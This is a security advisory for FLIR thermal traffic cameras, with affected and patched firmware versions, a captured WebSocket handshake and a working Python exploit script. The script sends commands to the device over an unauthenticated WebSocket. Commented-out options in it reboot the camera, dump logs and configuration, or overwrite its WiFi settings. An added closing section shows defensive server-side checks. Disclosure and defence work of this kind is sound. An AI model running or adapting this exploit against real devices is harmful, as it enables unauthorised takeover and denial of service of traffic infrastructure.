FLIR Thermal Traffic Cameras 1.01-0bb5b27 - Information Disclosure
Source: https://www.zeroscience.mk Author: LiquidWorm Published: 2018-10-09
# Title: FLIR Thermal Traffic Cameras 1.01-0bb5b27 - Information Disclosure
# Author: Gjoko 'LiquidWorm' Krstic
# Date: 2018-10-06
# Vendor: FLIR Systems, Inc.
# Link: https://www.flir.com
# Tested on: nginx/1.12.1, nginx/1.10.2, nginx/1.8.0, Websocket/13 (RFC 6455)
# Affected firmware version: V1.01-0bb5b27 (TrafiOne)     Codename: TrafiOne
#                            E1.00.09      (TI BPL2 EDGE) Codename: TIIP4EDGE
#                            V1.02.P01     (TI x-stream)  Codename: TIIP2
#                            V1.05.P01     (ThermiCam)    Codename: ThermiCam
#                            V1.04.P02     (ThermiCam)    Codename: ThermiCam
#                            V1.04         (ThermiCam)    Codename: ThermiCam
#                            V1.01.P02     (ThermiCam)    Codename: ThermiCam
#                            V1.05.P03     (TrafiSense)   Codename: TrafiSense
#                            V1.06         (VIP-IP)       Codename: VIP-IP
#                            V1.02.P02     (TrafiRadar)   Codename: TrafiRadar
#
# Vendor patched firmware version:
#
# Product name                Firmware      Released
# ----------------------------------------------------
# ThermiCam / TrafiSense      E1.06.03      17.09.2018
# TI BPL2 EDGE                V1.00         17.09.2018
# TI x-stream                 E1.03.02      17.09.2018
# TrafiOne                    E1.02.02      17.09.2018
# ----------------------------------------------------
#
# Advisory ID: ZSL-2018-5490
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5490.php
# Vendor firmware updates: https://www.flir.com/security/best-practices-for-cybersecurity/
# Vendor cyber hardening guide: https://www.flir.com/globalassets/security/flir-pro-security-cyber-hardening-guide.pdf
 
# Desc: FLIR thermal traffic cameras suffer from an unauthenticated device manipulation
# vulnerability utilizing the websocket protocol. The affected FLIR Intelligent
# Transportation Systems - ITS models use an insecure implementation of websocket
# communication used for administering the device. Authentication and authorization
# bypass via referencing a direct object allows an attacker to directly modify running
# configurations, disclose information or initiate a denial of service (DoS) scenario
# with the Reboot command. The devices do not support TLS (the 'wss://' prefix for
# WebSocket Secure connections), so network traffic is exposed in plain text to
# MitM evil-doers. Also, the web service has an Origin validation security issue and
# is vulnerable to Cross-Site WebSocket Hijacking (CSWSH).
#
# ---
# Request:
#
# GET ws://192.168.1.1:13042/ws/xml2 HTTP/1.1
# Host: 192.168.1.1:13042
# Connection: Upgrade
# Pragma: no-cache
# Cache-Control: no-cache
# User-Agent: Bond/00.7
# Upgrade: websocket
# Origin: zeroscience.mk:1337
# Sec-WebSocket-Version: 13
# Accept-Encoding: gzip, deflate
# Accept-Language: en-US,en;q=0.9
# Cookie: tmhDynamicLocale.locale=%22en%22
# Sec-WebSocket-Key: A5SH9PRtc3rYF49kKO4vmw==
# Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
#
# Response:
#
# HTTP/1.1 101 Switching Protocols
# Server: nginx/1.10.2
# Date: Mon, 13 Aug 2018 02:48:46 GMT
# Content-Length: 0
# Connection: upgrade
# Upgrade: WebSocket
# Sec-WebSocket-Accept: QyXaTdjpCsAyxhVnVqjMg95jepk=
#
# ---
# No HTTP/1.1 401 Unauthorized response observed.
#
 
#!/usr/bin/env python
# -*- coding: utf-8 -*-
 
from websocket import create_connection as t00t
import time
import sys
 
endpoint = "/ws/xml2"
 
if (len(sys.argv) <= 2):
    print '[*] Usage: exploit.py <ipaddress> <port>'
    exit(0)
 
host = sys.argv[1]
port = sys.argv[2]
 
# Supported message types:
'''
<Message Type="SupportedMessages">
<Body>
    <Message Type="GetMessageConstraints"/>
    <Message Type="GetSupportedMessages"/>
    <Message Type="Session"/>
    <Message Type="Subscription"/>
    <Message Type="ClearData"/>
    <Message Type="GetConnectionInformation"/>
    <Message Type="GetData"/>
    <Message Type="GetEvents"/>
    <Message Type="GetLostData"/>
    <Message Type="GetManagedBy"/>
    <Message Type="GetPresenceData"/>
    <Message Type="GetPresenceLevel"/>
    <Message Type="GetPresenceLevelHistory"/>
    <Message Type="GetStorageLimits"/>
    <Message Type="SetConnectionSettings"/>
    <Message Type="SetManagedBy"/>
    <Message Type="ClearBootCount"/>
    <Message Type="ClearHistogram"/>
    <Message Type="ClearStoredCounter"/>
    <Message Type="ClearSystemLogs"/>
    <Message Type="CreateAviSequence"/>
    <Message Type="DoBadStuff"/> <-- ;]]
    <Message Type="ForceEvent"/>
    <Message Type="ForceKeyframe"/>
    <Message Type="GetBootCount"/>
    <Message Type="GetBplSettings"/>
    <Message Type="GetCameraConfiguration"/>
    <Message Type="GetCameraDefinitions"/>
    <Message Type="GetCameraSettings"/>
    <Message Type="GetConfiguration"/>
    <Message Type="GetConstraints"/>
    <Message Type="GetCpuStatistics"/>
    <Message Type="GetDateTime"/>
    <Message Type="GetDisplayOverlay"/>
    <Message Type="GetEventLog"/>
    <Message Type="GetEventsDescription"/>
    <Message Type="GetFrameFlow"/>
    <Message Type="GetHardwareInformation"/>
    <Message Type="GetHardwareSensors"/>
    <Message Type="GetHistogram"/>
    <Message Type="GetImage"/>
    <Message Type="GetImageSharpness"/>
    <Message Type="GetLeptonSettings"/>
    <Message Type="GetLoggingActivation"/>
    <Message Type="GetMemoryStatistics"/>
    <Message Type="GetNumberOfOutputs"/>
    <Message Type="GetOpenEvents"/>
    <Message Type="GetOutputsState"/>
    <Message Type="GetPermissions"/>
    <Message Type="GetProductInformation"/>
    <Message Type="GetSocketInformation"/>
    <Message Type="GetState"/>
    <Message Type="GetStoredCounter"/>
    <Message Type="GetSystemLogs"/>
    <Message Type="GetTemperature"/>
    <Message Type="GetThermalQualityHistogram"/>
    <Message Type="GetThermalQualityReferenceImage"/>
    <Message Type="GetThreadInformation"/>
    <Message Type="GetTime"/>
    <Message Type="GetTranslations"/>
    <Message Type="GetUpTime"/>
    <Message Type="GetVersion"/>
    <Message Type="GetVoltage"/>
    <Message Type="GetWifiInformation"/>
    <Message Type="KeepAlive"/>
    <Message Type="Notify"/>
    <Message Type="PauseDetectionFramework"/>
    <Message Type="Reboot"/>
    <Message Type="SetBplSettings"/>
    <Message Type="SetCameraConfiguration"/>
    <Message Type="SetCameraSettings"/>
    <Message Type="SetConfiguration"/>
    <Message Type="SetConstraintsFilter"/>
    <Message Type="SetDateTime"/>
    <Message Type="SetDisplayOverlay"/>
    <Message Type="SetHardwareInformation"/>
    <Message Type="SetLeptonSettings"/>
    <Message Type="SetLoggingActivation"/>
    <Message Type="SetTime"/>
    <Message Type="SetWifiInformation"/>
    <Message Type="UpdateFrameFlow"/>
</Body>
</Message>
'''
 
socket = t00t("ws://"+host+":"+port+endpoint)
 
#print 'Sending Reboot message type (DoS)...'
#msg = '<Message Type=\"Reboot\"></Message>'
#print 'Getting supported messages...'
#msg = '<Message Type=\"GetSupportedMessages\"></Message>'
#print 'Getting system logs...'
#msg = '<Message Type=\"GetSystemLogs\"></Message>'
#print 'Getting device configuration...'
#msg = '<Message Type=\"GetConfiguration\"></Message>'
#print 'Setting new Wifi information...'
#msg ='''
#<Message Type="SetWifiInformation">
#    <Body Present="0" SSID="pwned" Channel="11" Hidden="0" Mode="AccessPoint" />
#</Message>
#'''
 
msg = '<Message Type=\"GetProductInformation\"></Message>'
 
socket.send(msg)
print 'Message sent.'
print 'Receiving...'
time.sleep(2)
priem =  socket.recv()
print 'Received data: \n%s' % priem
socket.close()
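
The handshake captured in the advisory is answered with 101 although it arrives over plain ws://, from a foreign Origin, and without any session credential. The following Python 3 code is an added example, not part of the original advisory or the vendor's firmware: it shows the server-side upgrade checks whose absence the advisory describes. The allowed origin, the `session` cookie name and the token value are assumptions made for illustration.

```python
import hmac

ALLOWED_ORIGINS = {"https://192.168.1.1"}   # assumption: the device's own web UI origin
VALID_TOKENS = {"constructed-token-123"}    # assumption: tokens issued after a login
SESSION_COOKIE = "session"                  # hypothetical cookie name

# Upgrade request as captured in the advisory (headers relevant to the checks).
ADVISORY_REQUEST = """GET ws://192.168.1.1:13042/ws/xml2 HTTP/1.1
Host: 192.168.1.1:13042
Connection: Upgrade
Upgrade: websocket
Origin: zeroscience.mk:1337
Sec-WebSocket-Version: 13
Cookie: tmhDynamicLocale.locale=%22en%22
Sec-WebSocket-Key: A5SH9PRtc3rYF49kKO4vmw==
"""

def parse_headers(raw):
    """Return the request headers as a dict with lower-cased names."""
    headers = {}
    for line in raw.strip().splitlines()[1:]:   # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers

def check_upgrade(raw, tls):
    """Return (status, findings); the upgrade is granted only when status is 101."""
    h = parse_headers(raw)
    findings = []
    if not tls:
        findings.append("plaintext ws://, require wss://")
    # CSWSH defence: the browser-supplied Origin must be on an explicit allowlist.
    if h.get("origin") not in ALLOWED_ORIGINS:
        findings.append("origin not allowed")
    # Authentication: a valid session token must accompany the handshake itself.
    cookies = dict(p.strip().partition("=")[::2]
                   for p in h.get("cookie", "").split(";"))
    token = cookies.get(SESSION_COOKIE, "").encode()
    if not any(hmac.compare_digest(token, t.encode()) for t in VALID_TOKENS):
        findings.append("no authenticated session")
    if not findings:
        return 101, []
    return (401 if "no authenticated session" in findings else 403), findings

if __name__ == "__main__":
    print(check_upgrade(ADVISORY_REQUEST, tls=False))
```

The Origin allowlist only protects browser users against CSWSH, because a non-browser client can send any Origin it likes; the session check is what closes the unauthenticated access.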
 